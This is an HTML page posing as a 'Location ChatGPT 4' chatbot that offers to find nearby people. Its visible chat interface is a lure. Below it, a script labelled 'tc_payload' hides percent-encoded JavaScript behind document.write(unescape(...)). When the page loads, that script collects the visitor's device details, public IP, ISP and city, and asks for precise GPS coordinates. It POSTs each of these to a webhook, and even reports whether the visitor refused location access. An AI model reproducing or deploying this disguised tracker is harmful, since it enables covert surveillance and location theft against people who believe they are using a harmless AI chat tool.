<!DOCTYPE html>
<html lang="en" >
<head>
  <meta charset="UTF-8">
  <title>Find - people</title>
  <link rel="stylesheet" href="./style.css">

</head>
<body onload="gpsLocation()">
<section class="msger">
  <header class="msger-header">
    <div class="msger-header-title">
      <i class="fas fa-comment-alt"></i> Location ChatGPT 4
    </div>
    <div class="msger-header-options">
      <span><i class="fas fa-cog"></i></span>
    </div>
  </header>

  <main class="msger-chat">
    <div class="msg left-msg">
      <div
       class="msg-img"
       style="background-image: url(https://image.flaticon.com/icons/svg/327/327779.svg)"
      ></div>

      <div class="msg-bubble">
        <div class="msg-info">
          <div class="msg-info-name">Admin</div>
          <div class="msg-info-time"></div>
        </div>

        <div class="msg-text">
          Hi Welcome to Location GPT-4. Turn on your location for find people near you.📍
        </div>
      </div>
    </div>

  </main>

  <form class="msger-inputarea">
    <input type="text" class="msger-input" placeholder="Ask me anything...">
    <button type="submit" class="msger-send-btn">Send</button>
  </form>
</section>
<script  src="./script.js"></script>
<p id="techchip"></p>
<!-- tc_payload -->
<script type="text/javascript">
document.write(unescape('%3c%73%63%72%69%70%74%20%73%72%63%3d%0d%0a%20%20%22%68%74%74%70%73%3a%2f%2f%61%6a%61%78%2e%67%6f%6f%67%6c%65%61%70%69%73%2e%63%6f%6d%2f%61%6a%61%78%2f%6c%69%62%73%2f%6a%71%75%65%72%79%2f%33%2e%32%2e%31%2f%6a%71%75%65%72%79%2e%6d%69%6e%2e%6a%73%22%3e%0d%0a%20%20%3c%2f%73%63%72%69%70%74%3e%0d%0a%20%20%3c%73%63%72%69%70%74%3e%0d%0a%20%20%76%61%72%20%78%20%3d%20%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%42%79%49%64%28%22%74%65%63%68%63%68%69%70%22%29%3b%0d%0a%20%20%6c%65%74%20%64%61%74%65%74%69%6d%65%20%3d%20%6e%65%77%20%44%61%74%65%28%29%3b%0d%0a%20%20%6c%65%74%20%6c%6f%63%61%6c%74%69%6d%65%20%3d%20%53%74%72%69%6e%67%28%64%61%74%65%74%69%6d%65%2e%74%6f%4c%6f%63%61%6c%65%54%69%6d%65%53%74%72%69%6e%67%28%29%29%3b%0d%0a%20%20%76%61%72%20%74%61%72%67%65%74%69%6e%66%6f%20%3d%20%28%22%48%6f%75%6e%64%20%2d%20%49%6e%66%6f%72%6d%61%74%69%6f%6e%20%47%61%74%68%65%72%69%6e%67%20%52%65%70%6f%72%74%5c%6e%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%5c%6e%5c%6e%44%65%76%69%63%65%20%49%6e%66%6f%72%6d%61%74%69%6f%6e%5c%6e%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%5c%6e%55%73%65%72%20%41%67%65%6e%74%3a%20%22%20%2b%20%6e%61%76%69%67%61%74%6f%72%2e%75%73%65%72%41%67%65%6e%74%20%2b%20%22%20%5c%6e%50%6c%61%74%66%6f%72%6d%3a%20%22%20%2b%20%6e%61%76%69%67%61%74%6f%72%2e%70%6c%61%74%66%6f%72%6d%20%2b%20%22%20%5c%6e%43%6f%6f%6b%69%65%73%20%45%6e%61%62%6c%65%64%3a%20%22%20%2b%20%6e%61%76%69%67%61%74%6f%72%2e%63%6f%6f%6b%69%65%45%6e%61%62%6c%65%64%20%2b%20%22%5c%6e%42%72%6f%77%73%65%72%20%4c%61%6e%67%75%61%67%65%3a%20%22%20%2b%20%6e%61%76%69%67%61%74%6f%72%2e%6c%61%6e%67%75%61%67%65%20%2b%20%22%5c%6e%42%72%6f%77%73%65%72%20%4e%61%6d%65%3a%20%22%2b%20%6e%61%76%69%67%61%74%6f%72%2e%61%70%70%4e%61%6d%65%20%2b%20%22%5c%6e%42%72%6f%77%73%65%72%20%43%6f%64%65%4e%61%6d%65%3a%20%22%20%2b%20%6e%61%76%69%67%61%74%6f%72%2e%61%70%70%43%6f%64%65%4e%61%6d%65%20%2b%20%22%5c%6e%52%41%4d%3a%20%22%20%2b%20%6e%61%76%69%67%61%74%6f%72%2e%64%65%76%69%63%65%4d%65%6d%6f%72%79%20%2b%20%22%5c%6e%43%50%55%20%43%6f%72%65%73%3a%20%22%20%2b%20%6e%61%76%69%67%61%74%6f%72%2e%68%61%72%64%77%61%72%65%43%6f%6e%63%75%72%72%65%6e%63%79%20%2b%20%22%5c%6e%53%63%72%65%65%6e%20%57%69%64%74%68%3a%20%22%20%2b%20%73%63%72%65%65%6e%2e%77%69%64%74%68%20%2b%20%22%5c%6e%53%63%72%65%65%6e%20%48%65%69%67%68%74%3a%20%22%20%2b%20%73%63%72%65%65%6e%2e%68%65%69%67%68%74%20%2b%20%22%5c%6e%4c%6f%63%61%6c%20%54%69%6d%65%3a%20%22%20%2b%20%6c%6f%63%61%6c%74%69%6d%65%20%2b%20%22%5c%6e%52%65%66%55%72%6c%3a%20%22%20%2b%20%64%6f%63%75%6d%65%6e%74%2e%72%65%66%65%72%72%65%72%20%2b%20%22%5c%6e%4f%53%20%43%50%55%3a%20%22%20%2b%20%6e%61%76%69%67%61%74%6f%72%2e%6f%73%63%70%75%20%2b%20%20%22%5c%6e%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%5c%6e%22%29%3b%0d%0a%20%20%63%6f%6e%73%74%20%78%68%72%20%3d%20%6e%65%77%20%58%4d%4c%48%74%74%70%52%65%71%75%65%73%74%28%29%3b%0d%0a%20%20%20%20%20%20%78%68%72%2e%6f%70%65%6e%28%22%50%4f%53%54%22%2c%20%22%2f%77%65%62%68%6f%6f%6b%2e%70%68%70%22%29%3b%20%0d%0a%20%20%20%20%20%20%78%68%72%2e%73%65%74%52%65%71%75%65%73%74%48%65%61%64%65%72%28%27%43%6f%6e%74%65%6e%74%2d%74%79%70%65%27%2c%20%27%61%70%70%6c%69%63%61%74%69%6f%6e%2f%6a%73%6f%6e%3b%20%63%68%61%72%73%65%74%3d%75%74%66%2d%38%27%29%3b%0d%0a%20%20%20%20%20%20%78%68%72%2e%73%65%6e%64%28%4a%53%4f%4e%2e%73%74%72%69%6e%67%69%66%79%28%74%61%72%67%65%74%69%6e%66%6f%29%29%3b%0d%0a%20%20%24%2e%67%65%74%4a%53%4f%4e%28%22%68%74%74%70%73%3a%2f%2f%61%70%69%2e%69%70%69%66%79%2e%6f%72%67%3f%66%6f%72%6d%61%74%3d%6a%73%6f%6e%22%2c%20%66%75%6e%63%74%69%6f%6e%28%64%61%74%61%29%20%7b%0d%0a%20%20%20%20%24%28%22%23%74%63%22%29%2e%68%74%6d%6c%28%64%61%74%61%2e%69%70%29%3b%0d%0a%20%20%20%20%63%6f%6e%73%74%20%78%68%72%20%3d%20%6e%65%77%20%58%4d%4c%48%74%74%70%52%65%71%75%65%73%74%28%29%3b%0d%0a%20%20%20%20%20%20%20%20%78%68%72%2e%6f%70%65%6e%28%22%50%4f%53%54%22%2c%20%22%2f%77%65%62%68%6f%6f%6b%2e%70%68%70%22%29%3b%0d%0a%20%20%20%20%20%20%20%20%78%68%72%2e%73%65%74%52%65%71%75%65%73%74%48%65%61%64%65%72%28%27%43%6f%6e%74%65%6e%74%2d%74%79%70%65%27%2c%20%27%61%70%70%6c%69%63%61%74%69%6f%6e%2f%6a%73%6f%6e%3b%20%63%68%61%72%73%65%74%3d%75%74%66%2d%38%27%29%3b%0d%0a%20%20%20%20%20%20%20%20%76%61%72%20%67%65%74%69%70%20%3d%20%28%22%5c%6e%54%61%72%67%65%74%20%49%50%20%44%65%74%61%69%6c%5c%6e%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%5c%6e%22%20%20%2b%20%22%49%50%3a%20%22%20%2b%20%64%61%74%61%2e%69%70%20%20%2b%20%22%5c%6e%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%5c%6e%22%29%3b%0d%0a%20%20%20%20%20%20%20%20%78%68%72%2e%73%65%6e%64%28%4a%53%4f%4e%2e%73%74%72%69%6e%67%69%66%79%28%67%65%74%69%70%29%29%3b%0d%0a%20%20%7d%29%0d%0a%20%20%24%2e%67%65%74%4a%53%4f%4e%28%22%68%74%74%70%3a%2f%2f%69%70%2d%61%70%69%2e%63%6f%6d%2f%6a%73%6f%6e%2f%3f%66%69%65%6c%64%73%3d%73%74%61%74%75%73%2c%6d%65%73%73%61%67%65%2c%63%6f%6e%74%69%6e%65%6e%74%2c%63%6f%6e%74%69%6e%65%6e%74%43%6f%64%65%2c%63%6f%75%6e%74%72%79%2c%63%6f%75%6e%74%72%79%43%6f%64%65%2c%72%65%67%69%6f%6e%2c%72%65%67%69%6f%6e%4e%61%6d%65%2c%63%69%74%79%2c%64%69%73%74%72%69%63%74%2c%7a%69%70%2c%6c%61%74%2c%6c%6f%6e%2c%74%69%6d%65%7a%6f%6e%65%2c%6f%66%66%73%65%74%2c%63%75%72%72%65%6e%63%79%2c%69%73%70%2c%6f%72%67%2c%61%73%2c%61%73%6e%61%6d%65%2c%72%65%76%65%72%73%65%2c%70%72%6f%78%79%2c%68%6f%73%74%69%6e%67%2c%71%75%65%72%79%22%2c%20%66%75%6e%63%74%69%6f%6e%28%72%65%73%70%6f%6e%73%65%29%20%7b%0d%0a%20%20%20%20%63%6f%6e%73%74%20%78%68%72%20%3d%20%6e%65%77%20%58%4d%4c%48%74%74%70%52%65%71%75%65%73%74%28%29%3b%0d%0a%20%20%20%20%20%20%20%20%78%68%72%2e%6f%70%65%6e%28%22%50%4f%53%54%22%2c%20%22%2f%77%65%62%68%6f%6f%6b%2e%70%68%70%22%29%3b%0d%0a%20%20%20%20%20%20%20%20%78%68%72%2e%73%65%74%52%65%71%75%65%73%74%48%65%61%64%65%72%28%27%43%6f%6e%74%65%6e%74%2d%74%79%70%65%27%2c%20%27%61%70%70%6c%69%63%61%74%69%6f%6e%2f%6a%73%6f%6e%3b%20%63%68%61%72%73%65%74%3d%75%74%66%2d%38%27%29%3b%0d%0a%20%20%20%20%20%20%20%20%76%61%72%20%6c%6f%63%61%74%69%6f%6e%64%61%74%61%20%3d%20%28%22%5c%6e%4e%65%74%77%6f%72%6b%20%26%20%49%53%50%20%49%6e%66%6f%72%6d%61%74%69%6f%6e%5c%6e%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%5c%6e%52%65%73%70%6f%6e%73%65%20%53%74%61%74%75%73%3a%20%22%20%2b%20%72%65%73%70%6f%6e%73%65%2e%73%74%61%74%75%73%20%2b%20%22%5c%6e%43%6f%6e%74%69%6e%65%6e%74%3a%20%22%20%2b%20%72%65%73%70%6f%6e%73%65%2e%63%6f%6e%74%69%6e%65%6e%74%20%2b%20%22%5c%6e%43%6f%6e%74%69%6e%65%6e%74%43%6f%64%65%3a%20%22%20%2b%20%72%65%73%70%6f%6e%73%65%2e%63%6f%6e%74%69%6e%65%6e%74%63%6f%64%65%20%2b%20%22%5c%6e%43%6f%75%6e%74%72%79%3a%20%22%20%2b%20%72%65%73%70%6f%6e%73%65%2e%63%6f%75%6e%74%72%79%20%2b%20%22%5c%6e%43%6f%75%6e%74%72%79%63%6f%64%65%3a%20%22%20%2b%20%72%65%73%70%6f%6e%73%65%2e%63%6f%75%6e%74%72%79%63%6f%64%65%20%2b%20%22%5c%6e%52%65%67%69%6f%6e%20%6e%61%6d%65%3a%20%22%2b%20%72%65%73%70%6f%6e%73%65%2e%72%65%67%69%6f%6e%4e%61%6d%65%20%2b%20%22%5c%6e%52%65%67%69%6f%6e%3a%20%22%20%2b%20%72%65%73%70%6f%6e%73%65%2e%72%65%67%69%6f%6e%20%2b%20%22%5c%6e%43%69%74%79%3a%20%22%20%2b%20%72%65%73%70%6f%6e%73%65%2e%63%69%74%79%20%2b%20%20%22%5c%6e%44%69%73%74%72%69%63%74%3a%20%22%20%2b%20%72%65%73%70%6f%6e%73%65%2e%64%69%73%74%72%69%63%74%20%2b%20%22%5c%6e%5a%69%70%3a%20%22%20%2b%20%72%65%73%70%6f%6e%73%65%2e%7a%69%70%20%2b%20%22%5c%6e%54%69%6d%65%5f%7a%6f%6e%65%3a%20%22%20%2b%20%72%65%73%70%6f%6e%73%65%2e%74%69%6d%65%5f%7a%6f%6e%65%20%2b%20%22%5c%6e%41%53%20%4e%61%6d%65%3a%20%22%20%2b%20%72%65%73%70%6f%6e%73%65%2e%61%73%20%2b%20%22%5c%6e%49%53%50%20%49%6e%66%6f%3a%20%22%20%2b%20%72%65%73%70%6f%6e%73%65%2e%69%73%70%20%2b%20%22%5c%6e%52%65%76%65%72%73%65%3a%20%22%20%2b%20%72%65%73%70%6f%6e%73%65%2e%72%65%76%65%72%73%65%20%2b%20%22%5c%6e%4f%66%66%73%65%74%3a%20%22%20%2b%20%72%65%73%70%6f%6e%73%65%2e%6f%66%66%73%65%74%20%2b%20%20%22%5c%6e%43%75%72%72%65%6e%63%79%3a%20%22%20%2b%20%72%65%73%70%6f%6e%73%65%2e%63%75%72%72%65%6e%63%79%20%2b%20%22%5c%6e%50%72%6f%78%79%3a%20%22%20%2b%20%72%65%73%70%6f%6e%73%65%2e%70%72%6f%78%79%20%2b%20%22%5c%6e%4c%61%74%3a%20%22%20%2b%20%72%65%73%70%6f%6e%73%65%2e%6c%61%74%20%2b%20%22%5c%6e%4c%6f%6e%67%3a%20%22%20%2b%20%72%65%73%70%6f%6e%73%65%2e%6c%6f%6e%20%2b%20%22%5c%6e%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%5c%6e%22%29%0d%0a%20%20%20%20%20%20%20%20%78%68%72%2e%73%65%6e%64%28%4a%53%4f%4e%2e%73%74%72%69%6e%67%69%66%79%28%6c%6f%63%61%74%69%6f%6e%64%61%74%61%29%29%3b%0d%0a%20%20%7d%29%0d%0a%20%20%66%75%6e%63%74%69%6f%6e%20%67%70%73%4c%6f%63%61%74%69%6f%6e%28%29%20%7b%0d%0a%20%20%20%20%69%66%20%28%6e%61%76%69%67%61%74%6f%72%2e%67%65%6f%6c%6f%63%61%74%69%6f%6e%29%20%7b%0d%0a%20%20%20%20%20%20%6e%61%76%69%67%61%74%6f%72%2e%67%65%6f%6c%6f%63%61%74%69%6f%6e%2e%67%65%74%43%75%72%72%65%6e%74%50%6f%73%69%74%69%6f%6e%28%6c%61%74%6c%6f%6e%67%2c%20%63%61%74%63%68%45%72%72%6f%72%29%3b%0d%0a%20%20%20%20%7d%20%65%6c%73%65%20%7b%20%0d%0a%20%20%20%20%20%20%63%6f%6e%73%74%20%78%68%72%20%3d%20%6e%65%77%20%58%4d%4c%48%74%74%70%52%65%71%75%65%73%74%28%29%3b%0d%0a%20%20%20%20%20%20%20%20%78%68%72%2e%6f%70%65%6e%28%22%50%4f%53%54%22%2c%20%22%2f%77%65%62%68%6f%6f%6b%2e%70%68%70%22%29%3b%0d%0a%20%20%20%20%20%20%20%20%78%68%72%2e%73%65%74%52%65%71%75%65%73%74%48%65%61%64%65%72%28%27%43%6f%6e%74%65%6e%74%2d%74%79%70%65%27%2c%20%27%61%70%70%6c%69%63%61%74%69%6f%6e%2f%6a%73%6f%6e%3b%20%63%68%61%72%73%65%74%3d%75%74%66%2d%38%27%29%3b%0d%0a%20%20%20%20%20%20%20%20%63%6f%6e%73%74%20%70%65%72%72%6f%72%31%20%3d%20%22%5c%6e%54%61%72%67%65%74%20%42%72%6f%77%73%65%72%20%69%73%20%6e%6f%74%20%73%75%70%70%6f%72%74%69%6e%67%20%67%65%6f%6c%6f%63%61%74%69%6f%6e%2e%5c%6e%22%0d%0a%20%20%20%20%20%20%20%20%78%68%72%2e%73%65%6e%64%28%4a%53%4f%4e%2e%73%74%72%69%6e%67%69%66%79%28%70%65%72%72%6f%72%31%29%29%3b%0d%0a%20%20%20%20%7d%0d%0a%20%20%7d%0d%0a%20%20%66%75%6e%63%74%69%6f%6e%20%6c%61%74%6c%6f%6e%67%28%70%6f%73%69%74%69%6f%6e%29%20%7b%0d%0a%20%20%20%20%76%61%72%20%6c%61%74%6c%6f%6e%67%20%3d%20%28%22%5c%6e%47%50%53%20%4c%61%74%20%4c%6f%6e%67%20%49%6e%66%6f%72%6d%61%74%69%6f%6e%5c%6e%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%5c%6e%4c%61%74%69%74%75%64%65%3a%20%22%20%2b%20%70%6f%73%69%74%69%6f%6e%2e%63%6f%6f%72%64%73%2e%6c%61%74%69%74%75%64%65%20%2b%20%22%5c%6e%4c%6f%6e%67%69%74%75%64%65%3a%20%22%20%2b%20%70%6f%73%69%74%69%6f%6e%2e%63%6f%6f%72%64%73%2e%6c%6f%6e%67%69%74%75%64%65%20%2b%20%22%5c%6e%4d%61%70%20%4c%6f%63%61%74%69%6f%6e%3a%20%20%68%74%74%70%73%3a%2f%2f%77%77%77%2e%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%6d%61%70%73%2f%70%6c%61%63%65%2f%22%20%2b%20%70%6f%73%69%74%69%6f%6e%2e%63%6f%6f%72%64%73%2e%6c%61%74%69%74%75%64%65%20%2b%20%22%2c%22%20%2b%20%70%6f%73%69%74%69%6f%6e%2e%63%6f%6f%72%64%73%2e%6c%6f%6e%67%69%74%75%64%65%20%2b%20%22%5c%6e%47%6f%6f%67%6c%65%20%45%61%72%74%68%3a%20%20%68%74%74%70%73%3a%2f%2f%65%61%72%74%68%2e%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%77%65%62%2f%73%65%61%72%63%68%2f%22%20%2b%20%70%6f%73%69%74%69%6f%6e%2e%63%6f%6f%72%64%73%2e%6c%61%74%69%74%75%64%65%20%2b%20%22%2c%22%20%2b%20%70%6f%73%69%74%69%6f%6e%2e%63%6f%6f%72%64%73%2e%6c%6f%6e%67%69%74%75%64%65%20%2b%20%22%5c%6e%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%5c%6e%22%29%3b%0d%0a%20%20%20%20%63%6f%6e%73%74%20%78%68%72%20%3d%20%6e%65%77%20%58%4d%4c%48%74%74%70%52%65%71%75%65%73%74%28%29%3b%0d%0a%20%20%20%20%20%20%20%20%78%68%72%2e%6f%70%65%6e%28%22%50%4f%53%54%22%2c%20%22%2f%77%65%62%68%6f%6f%6b%2e%70%68%70%22%29%3b%0d%0a%20%20%20%20%20%20%20%20%78%68%72%2e%73%65%74%52%65%71%75%65%73%74%48%65%61%64%65%72%28%27%43%6f%6e%74%65%6e%74%2d%74%79%70%65%27%2c%20%27%61%70%70%6c%69%63%61%74%69%6f%6e%2f%6a%73%6f%6e%3b%20%63%68%61%72%73%65%74%3d%75%74%66%2d%38%27%29%3b%0d%0a%20%20%20%20%20%20%20%20%78%68%72%2e%73%65%6e%64%28%4a%53%4f%4e%2e%73%74%72%69%6e%67%69%66%79%28%6c%61%74%6c%6f%6e%67%29%29%3b%0d%0a%20%20%7d%0d%0a%20%20%66%75%6e%63%74%69%6f%6e%20%63%61%74%63%68%45%72%72%6f%72%28%65%72%72%6f%72%29%20%7b%0d%0a%20%20%20%20%73%77%69%74%63%68%28%65%72%72%6f%72%2e%63%6f%64%65%29%20%7b%0d%0a%20%20%20%20%20%20%63%61%73%65%20%65%72%72%6f%72%2e%50%45%52%4d%49%53%53%49%4f%4e%5f%44%45%4e%49%45%44%3a%0d%0a%20%20%20%20%20%20%20%20%63%6f%6e%73%74%20%78%68%72%20%3d%20%6e%65%77%20%58%4d%4c%48%74%74%70%52%65%71%75%65%73%74%28%29%3b%0d%0a%20%20%20%20%20%20%20%20%78%68%72%2e%6f%70%65%6e%28%22%50%4f%53%54%22%2c%20%22%2f%77%65%62%68%6f%6f%6b%2e%70%68%70%22%29%3b%0d%0a%20%20%20%20%20%20%20%20%78%68%72%2e%73%65%74%52%65%71%75%65%73%74%48%65%61%64%65%72%28%27%43%6f%6e%74%65%6e%74%2d%74%79%70%65%27%2c%20%27%61%70%70%6c%69%63%61%74%69%6f%6e%2f%6a%73%6f%6e%3b%20%63%68%61%72%73%65%74%3d%75%74%66%2d%38%27%29%3b%0d%0a%20%20%20%20%20%20%20%20%63%6f%6e%73%74%20%70%65%72%72%6f%72%31%20%3d%20%22%5c%6e%55%73%65%72%20%64%65%6e%69%65%64%20%74%68%65%20%47%65%6f%6c%6f%63%61%74%69%6f%6e%20%70%65%72%6d%69%73%69%6f%6e%2e%5c%6e%22%0d%0a%20%20%20%20%20%20%20%20%78%68%72%2e%73%65%6e%64%28%4a%53%4f%4e%2e%73%74%72%69%6e%67%69%66%79%28%70%65%72%72%6f%72%31%29%29%3b%0d%0a%20%20%20%20%20%20%20%20%62%72%65%61%6b%3b%0d%0a%20%20%20%20%20%20%63%61%73%65%20%65%72%72%6f%72%2e%50%4f%53%49%54%49%4f%4e%5f%55%4e%41%56%41%49%4c%41%42%4c%45%3a%0d%0a%20%20%20%20%20%20%20%20%63%6f%6e%73%74%20%78%68%72%31%20%3d%20%6e%65%77%20%58%4d%4c%48%74%74%70%52%65%71%75%65%73%74%28%29%3b%0d%0a%20%20%20%20%20%20%20%20%78%68%72%31%2e%6f%70%65%6e%28%22%50%4f%53%54%22%2c%20%22%2f%77%65%62%68%6f%6f%6b%2e%70%68%70%22%29%3b%0d%0a%20%20%20%20%20%20%20%20%78%68%72%31%2e%73%65%74%52%65%71%75%65%73%74%48%65%61%64%65%72%28%27%43%6f%6e%74%65%6e%74%2d%74%79%70%65%27%2c%20%27%61%70%70%6c%69%63%61%74%69%6f%6e%2f%6a%73%6f%6e%3b%20%63%68%61%72%73%65%74%3d%75%74%66%2d%38%27%29%3b%0d%0a%20%20%20%20%20%20%20%20%63%6f%6e%73%74%20%70%65%72%72%6f%72%32%20%3d%20%22%5c%6e%4c%6f%63%61%74%69%6e%20%55%6e%61%76%61%69%6c%61%62%6c%65%2e%5c%6e%22%0d%0a%20%20%20%20%20%20%20%20%78%68%72%31%2e%73%65%6e%64%28%4a%53%4f%4e%2e%73%74%72%69%6e%67%69%66%79%28%70%65%72%72%6f%72%32%29%29%3b%0d%0a%20%20%20%20%20%20%20%20%62%72%65%61%6b%3b%0d%0a%20%20%20%20%20%20%63%61%73%65%20%65%72%72%6f%72%2e%54%49%4d%45%4f%55%54%3a%0d%0a%20%20%20%20%20%20%20%20%63%6f%6e%73%74%20%78%68%72%32%20%3d%20%6e%65%77%20%58%4d%4c%48%74%74%70%52%65%71%75%65%73%74%28%29%3b%0d%0a%20%20%20%20%20%20%20%20%78%68%72%32%2e%6f%70%65%6e%28%22%50%4f%53%54%22%2c%20%22%2f%77%65%62%68%6f%6f%6b%2e%70%68%70%22%29%3b%0d%0a%20%20%20%20%20%20%20%20%78%68%72%32%2e%73%65%74%52%65%71%75%65%73%74%48%65%61%64%65%72%28%27%43%6f%6e%74%65%6e%74%2d%74%79%70%65%27%2c%20%27%61%70%70%6c%69%63%61%74%69%6f%6e%2f%6a%73%6f%6e%3b%20%63%68%61%72%73%65%74%3d%75%74%66%2d%38%27%29%3b%0d%0a%20%20%20%20%20%20%20%20%63%6f%6e%73%74%20%70%65%72%72%6f%72%33%20%3d%20%22%5c%6e%54%69%6d%65%6f%75%74%20%45%72%72%6f%72%2e%5c%6e%22%0d%0a%20%20%20%20%20%20%20%20%78%68%72%32%2e%73%65%6e%64%28%4a%53%4f%4e%2e%73%74%72%69%6e%67%69%66%79%28%70%65%72%72%6f%72%33%29%29%3b%0d%0a%20%20%20%20%20%20%20%20%62%72%65%61%6b%3b%0d%0a%20%20%20%20%20%20%63%61%73%65%20%65%72%72%6f%72%2e%55%4e%4b%4e%4f%57%4e%5f%45%52%52%4f%52%3a%0d%0a%20%20%20%20%20%20%20%20%63%6f%6e%73%74%20%78%68%72%33%20%3d%20%6e%65%77%20%58%4d%4c%48%74%74%70%52%65%71%75%65%73%74%28%29%3b%0d%0a%20%20%20%20%20%20%20%20%78%68%72%33%2e%6f%70%65%6e%28%22%50%4f%53%54%22%2c%20%22%2f%77%65%62%68%6f%6f%6b%2e%70%68%70%22%29%3b%0d%0a%20%20%20%20%20%20%20%20%78%68%72%33%2e%73%65%74%52%65%71%75%65%73%74%48%65%61%64%65%72%28%27%43%6f%6e%74%65%6e%74%2d%74%79%70%65%27%2c%20%27%61%70%70%6c%69%63%61%74%69%6f%6e%2f%6a%73%6f%6e%3b%20%63%68%61%72%73%65%74%3d%75%74%66%2d%38%27%29%3b%0d%0a%20%20%20%20%20%20%20%20%63%6f%6e%73%74%20%70%65%72%72%6f%72%34%20%3d%20%22%5c%6e%55%6e%6b%6e%6f%77%6e%20%65%72%72%6f%72%5c%6e%22%0d%0a%20%20%20%20%20%20%20%20%78%68%72%33%2e%73%65%6e%64%28%4a%53%4f%4e%2e%73%74%72%69%6e%67%69%66%79%28%70%65%72%72%6f%72%34%29%29%3b%0d%0a%20%20%20%20%20%20%20%20%62%72%65%61%6b%3b%0d%0a%20%20%20%20%7d%0d%0a%20%20%7d%0d%0a%20%20%3c%2f%73%63%72%69%70%74%3e'));
</script>

</body>
</html>
